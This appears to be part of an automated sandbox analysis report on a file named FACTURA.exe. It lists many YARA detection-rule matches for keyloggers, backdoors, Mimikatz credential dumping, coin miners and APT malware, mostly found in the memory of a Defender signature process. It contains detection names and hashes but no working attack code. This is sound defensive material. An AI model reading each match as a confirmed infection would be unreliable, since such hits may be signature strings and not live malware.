Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: Keylogger component Author: Microsoft
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp, type: MEMORY Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects Tofu Trojan Author: Cylance
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Keylogger - generic rule for a Chinese variant Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Iron Panda Malware Htran Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Author: unknown
One or more processes crash
Source: C:\Users\user\Desktop\FACTURA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848
PE file contains strange resources
Source: FACTURA.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.45.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\FACTURA.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Section loaded: edgegdi.dll
Creates driver files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys
Uses 32bit PE files
Source: FACTURA.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a359b15e.156.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a3f84db6.63.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a48b4c13.120.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a364b8a5.203.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a4a13be1.134.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a359bd62.155.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a4a13be1.171.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a364b8a5.181.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a4f46966.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a3929e2b.149.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 36.3.MpSigStub.exe.197a4df1a99.144.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a37e87d6.70.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3f2e43a.61.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a364dcf9.202.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a32a3acd.179.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a364dcf9.182.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4a13be1.209.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a3f2fc42.62.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
